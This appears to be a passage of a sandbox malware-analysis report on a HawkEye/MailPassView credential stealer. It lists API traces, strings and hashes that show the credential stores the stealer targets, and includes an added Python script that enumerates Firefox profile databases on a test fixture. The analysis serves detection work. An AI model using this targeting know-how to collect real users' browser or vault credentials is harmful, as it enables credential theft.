• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004145CC, 004145DC
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2699640517-2036018995
• Opcode ID: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
• Instruction ID: e12ff53167afe07261100608862af2d586d512a8c684a17975878dc8bda8b34c
• Opcode Fuzzy Hash: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
• Instruction Fuzzy Hash: 42112B71800214BBEF20A759CC4EAEFB3BDDB85754F6100A7F914A2151E62C5FC5869E
Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 00413D15
• _snwprintf.MSVCRT ref: 00413D3A
• WritePrivateProfileStringW.KERNEL32(?,?,?,0044BCA0), ref: 00413D58
• GetPrivateProfileStringW.KERNEL32(?,?,0041139B,?,00000000,0044BCA0), ref: 00413D70
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
• Opcode ID: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
• Instruction ID: 73e04fdb7293ad0563e201354ce1ff8293903967f03a71563bfd8de655adbfaf
• Opcode Fuzzy Hash: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
• Instruction Fuzzy Hash: 2401AD3240521EBBEF229F91EC45FDB3B6AFF04745F14806ABA1854062D779C660DB98
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 0041338D
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 004133A7
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 004133CA
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
• Opcode ID: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
• Instruction ID: da68f8d270a38a3c71bb0a1d73356e5427966c5ec0fa45e2ea30989c2ad8b33c
• Opcode Fuzzy Hash: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
• Instruction Fuzzy Hash: 41F01535140208AFEF108F91EC44B9A7BA9AB08B86F404026FE18C1162CB75DAA0DB5C
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
• Instruction ID: 378f5b88a64b421c164fea27eec5394a6c1f6cf5fd0cfe57e22cb817cc3972c5
• Opcode Fuzzy Hash: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
• Instruction Fuzzy Hash: 4E51C1B59002059BDF14DF6AC8817DAB7F4AF54314F15019BEC04EB34AE778EA85CB98
Uniqueness Score: -1.00%
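
Added example (Python; not code from this report, and not the native code of the HawkEye/MailPassView sample). It reproduces, on a constructed APPDATA tree, what three of the function listings above show the stealer doing: the SHGetSpecialFolderPathW routine resolves CSIDL 0x1A (CSIDL_APPDATA), falling back to the Explorer "Shell Folders" registry key; the memset/wcscat routine appends "Mozilla\Firefox\Profiles" and the legacy "Mozilla\Profiles" to that folder; and the memcmp routine compares file contents against the 16-byte SQLite 3 header "SQLite format 3\0". Only the two path strings and the header value come from the report. The fixture layout, the file names places.sqlite, logins.json, prefs.js and notes.txt, and all function names are assumptions made for the example.

```python
"""
Added example (not from the Joe Sandbox report or the HawkEye/MailPassView
sample): Firefox profile discovery plus the SQLite header check, as a
portable re-implementation of the API sequences listed in the report.
"""
import os
import sqlite3
import tempfile

# Strings taken from the report. The native code obtains the base folder via
# SHGetSpecialFolderPathW(NULL, buf, 0x1A /* CSIDL_APPDATA */, FALSE).
PROFILE_ROOTS = (r"Mozilla\Firefox\Profiles", r"Mozilla\Profiles")

# 16-byte header that every SQLite 3 database file starts with; the report's
# memcmp routine compares against exactly this string.
SQLITE_MAGIC = b"SQLite format 3\x00"


def win_path(root, rel):
    """Join a backslash-separated Windows relative path onto root portably."""
    return os.path.join(root, *rel.split("\\"))


def find_profile_dirs(appdata):
    """Return every profile directory beneath the two Mozilla roots under appdata."""
    found = []
    for rel in PROFILE_ROOTS:
        base = win_path(appdata, rel)
        if not os.path.isdir(base):
            continue  # same behaviour as the native code when the folder is absent
        for name in sorted(os.listdir(base)):
            full = os.path.join(base, name)
            if os.path.isdir(full):
                found.append(full)
    return found


def is_sqlite_file(path):
    """True only if the file begins with the SQLite 3 magic (the memcmp check)."""
    try:
        with open(path, "rb") as fh:
            return fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC
    except OSError:
        return False


def enumerate_targets(appdata):
    """Map each profile directory to the SQLite databases a stealer would read from it."""
    targets = {}
    for profile in find_profile_dirs(appdata):
        targets[profile] = [
            name for name in sorted(os.listdir(profile))
            if is_sqlite_file(os.path.join(profile, name))
        ]
    return targets


def build_fixture():
    """Build a throwaway APPDATA tree (constructed data) with a modern and a legacy profile."""
    appdata = tempfile.mkdtemp(prefix="appdata_")
    modern = win_path(appdata, r"Mozilla\Firefox\Profiles\abcd1234.default-release")
    legacy = win_path(appdata, r"Mozilla\Profiles\default")
    for d in (modern, legacy):
        os.makedirs(d)
    # A genuine SQLite database: the header bytes are written by the library.
    con = sqlite3.connect(os.path.join(modern, "places.sqlite"))
    con.execute("CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT)")
    con.execute("INSERT INTO moz_places (url) VALUES ('https://example.invalid/')")
    con.commit()
    con.close()
    # Neighbouring files that must not be flagged.
    with open(os.path.join(modern, "logins.json"), "w") as fh:
        fh.write('{"logins": []}')
    with open(os.path.join(legacy, "prefs.js"), "w") as fh:
        fh.write("// constructed fixture\n")
    # Contains the magic, but not at offset 0: memcmp on the prefix rejects it.
    with open(os.path.join(legacy, "notes.txt"), "wb") as fh:
        fh.write(b"xx" + SQLITE_MAGIC)
    return appdata


if __name__ == "__main__":
    root = build_fixture()
    for profile, dbs in enumerate_targets(root).items():
        print(profile, "->", dbs)
```

Run directly, it prints each profile directory with the files that carry the SQLite header. Pointing enumerate_targets() at a real %APPDATA% on a machine you control lists exactly the files this routine would open, which is also the file set a file-access detection for this family should watch.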

APIs
  • Part of subcall function 00409A23: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
  • Part of subcall function 00409A23: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
  • Part of subcall function 00409A23: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
  • Part of subcall function 00409A23: GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
  • Part of subcall function 00409A23: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
  • Part of subcall function 00409A23: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
  • Part of subcall function 00409A23: WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
  • Part of subcall function 00409A23: UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
  • Part of subcall function 00409A23: FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
• FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409F87
  • Part of subcall function 00409CB0: memset.MSVCRT ref: 00409D85
  • Part of subcall function 00409CB0: wcschr.MSVCRT ref: 00409DBD
  • Part of subcall function 00409CB0: memcpy.MSVCRT ref: 00409DF1
• DeleteFileW.KERNELBASE(?,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FA8
• CloseHandle.KERNEL32(000000FF,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FCF
  • Part of subcall function 00409B7A: memset.MSVCRT ref: 00409BC2
  • Part of subcall function 00409B7A: _snwprintf.MSVCRT ref: 00409C5C
  • Part of subcall function 00409B7A: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,76D7F560), ref: 00409C90
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409EC7
Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                                                                                  • API String ID: 3931293568-1514811420
                                                                                                                                                                  • Opcode ID: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                  • Instruction ID: 3f51e9d3f4722dee63ca69fa5b044a2e48b650b6030bfe0f748ec1b1a5da80f7
                                                                                                                                                                  • Opcode Fuzzy Hash: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 65311CB1C006589BCF60DFA5CD855CDF7B8AF40314F1002AB9519F31A2DB755E858F58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                  • Opcode ID: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                  • Instruction ID: da88191f08b8b868428b3ed71d9c82d207ce8b6ace4e6628c3e2187065429015
                                                                                                                                                                  • Opcode Fuzzy Hash: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7521F271700502AFD714FF36C981A5AB3A9FF95304B01097FE459A72D2CB7ABC218B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00413ACB: FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
                                                                                                                                                                  • LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                                                                                  • API String ID: 145871493-2881415372
                                                                                                                                                                  • Opcode ID: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                  • Instruction ID: 165486c3e6602412b12b5041488cd1e6311a4fd56e7abe132b6c53b1702dbca2
                                                                                                                                                                  • Opcode Fuzzy Hash: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0E2302807125BEB206F76DC06B9B32D8AF44B4AF10C43EA052D55C1EBBCD4808B9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                  • Instruction ID: 83d98c8e739894f4f11ae52403c2f1a0732df397c2cb69f7507dcdbda06e161a
                                                                                                                                                                  • Opcode Fuzzy Hash: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                  • Instruction Fuzzy Hash: F7E04DA070030136BB20AFBAFD44B0323CC3A90793326482FB406D73D2EE2CE840A52C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043A1CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset
                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                  • Opcode ID: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                  • Instruction ID: e3eeb75a8af282f970fbf78469263b11f6465a284568bf7e48a5e115ce459d1a
                                                                                                                                                                  • Opcode Fuzzy Hash: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                  • Instruction Fuzzy Hash: F1828771A00208AFDF24DF69C881AAE7BA1FF08314F14411AFD559B3A2D77AEC51CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                  • Opcode ID: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                  • Instruction ID: 41d6ca53bbc25777d15e7d44d7af272a9a829ad4135043ac9a1f5f7c0c786f2e
                                                                                                                                                                  • Opcode Fuzzy Hash: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                  • Instruction Fuzzy Hash: ED0112F12023007FEB69DF38ED1772A66949B95393F00413FA506CD2F6EA79D5449B08
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004443B0: LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
                                                                                                                                                                    • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
                                                                                                                                                                  • memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadmemcmp
                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                  • API String ID: 2708812716-435121686
                                                                                                                                                                  • Opcode ID: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                  • Instruction ID: 4b210d59022fde833576912f2e87238d6fd1d6b03e73e285368f71a5ac649bda
                                                                                                                                                                  • Opcode Fuzzy Hash: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 73411171E00609ABEF10DF95C981BAFB7F4AF88714F11055AE915B3341DB78AE448BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A819
                                                                                                                                                                  • memset.MSVCRT ref: 0040A898
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                                                                                  • String ID: P5@
                                                                                                                                                                  • API String ID: 1960736289-1192260740
                                                                                                                                                                  • Opcode ID: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                  • Instruction ID: 9cce22c2db06112b06b017d7de527652cc15472bfd2168745658b7e1f8ccbd38
                                                                                                                                                                  • Opcode Fuzzy Hash: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                  • Instruction Fuzzy Hash: CC31D272500208AFDF10EFA4CC85DEE77B9AF48304F15887AF505F7281D638AE198B66
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416E8B: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
  • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EBD
  • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EC3
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00416F38
• GetLastError.KERNEL32 ref: 00416F42
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
• Instruction ID: add61fd64035c303a46c69afbbac6c0b4560a134b5de48ff3df98cfac7bf87f9
• Opcode Fuzzy Hash: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
• Instruction Fuzzy Hash: 2D01AD3A208208BBEB108F65EC45FEA3B6CEF053A4F114426F908C6250D724EC9186E9
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: wcslen$FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1858513025-2863569691
• Opcode ID: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
• Instruction ID: 18b6580ac0a830e75170eb0e1623f763ef95ee80692c464e75bb199377268105
• Opcode Fuzzy Hash: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
• Instruction Fuzzy Hash: 20016D7140526859EB20EA61DC42ADE726CAF04304F5001BBA818F21C2EB789F929F5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
• GetLastError.KERNEL32 ref: 00416EBD
• GetLastError.KERNEL32 ref: 00416EC3
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
• Instruction ID: 37b1e2f091545ca96408f8d6a34600ec4a403a46a608ba1f9fdc83bbdb8077e2
• Opcode Fuzzy Hash: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
• Instruction Fuzzy Hash: F4F06536914619BBCF009F74DC009EA7BE8EB05361B104726F832D62D1E731EE419A94
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
• GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
• Instruction ID: a19870345f686364ec187dd7d23bdf0954ef371c81d74b5a6631b0975d4c9c24
• Opcode Fuzzy Hash: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
• Instruction Fuzzy Hash: BDE0927A900328BBDF205B60DC0CFCB377CEF46304F000070B945E6152EA7896888BA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• malloc.MSVCRT ref: 004080C8
• memcpy.MSVCRT ref: 004080E0
• free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
• Instruction ID: 78eaf63d8c2f3f9895426ca65e1500e544e2a4a90d5a49d0f549448db46f5a47
• Opcode Fuzzy Hash: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
• Instruction Fuzzy Hash: 50F0E2726052229FD718EE75BA8180BB39DAF85364712883FF444E3282DF3C9C44C7A8
Uniqueness
Uniqueness Score: -1.00%

Strings
• failed memory resize %u to %u bytes, xrefs: 00414CAE
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: realloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 471065373-2134078882
• Opcode ID: 6d5c13ae5ff5f1f73361908e0861040f7e86b36e775a6607f02a377230548c68
• Instruction ID: 73c2e8b64515ac6a599151bee48865edbc87acd3c1049f650c7b7cc69a7d2516
• Opcode Fuzzy Hash: 6d5c13ae5ff5f1f73361908e0861040f7e86b36e775a6607f02a377230548c68
• Instruction Fuzzy Hash: 9CF020B3A022026BC2009AA5CC81AC7F39C8FC0720B16082BF948D3200F628E88143EA
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileRead
• String ID: CCD
• API String ID: 2738559852-662205380
• Opcode ID: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
• Instruction ID: 69216e87a8676b039392231de9c3b52b74dec2ebcb54b9129181f8e0c6c75afe
• Opcode Fuzzy Hash: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
• Instruction Fuzzy Hash: 6CD0C93541020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB54
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: 581700d0edc2a8117bb5fbd40871278af0e05eb09add98efced60719e19a31a8
• Instruction ID: fc4515617b89e60a19d50c15f4f69ae244da8edec6c232cce581781c6edd6396
• Opcode Fuzzy Hash: 581700d0edc2a8117bb5fbd40871278af0e05eb09add98efced60719e19a31a8
• Instruction Fuzzy Hash: 5981B031608312AFCB10DF19D84165FBBE0EF88718F12992FF8949B251D778DA45CB9A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
• Opcode ID: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
• Instruction ID: 80603cce4df8086f4253f53369ac634731a2704b4a2dc635bb3c7b15e71801b6
• Opcode Fuzzy Hash: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
• Instruction Fuzzy Hash: B951AD75A043459FDB21DF2AC881BEA7BE4EF48350F14446AEC89CB341D738D980CBA9
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
  • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
  • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
• GetStdHandle.KERNEL32(000000F5,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DD6C
• FindCloseChangeNotification.KERNELBASE(00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DE90
  • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
  • Part of subcall function 00407DF4: GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
  • Part of subcall function 00407DF4: _snwprintf.MSVCRT ref: 00407E35
  • Part of subcall function 00407DF4: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916

Strings
• failed to allocate %u bytes of memory, xrefs: 00414C46
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600

APIs
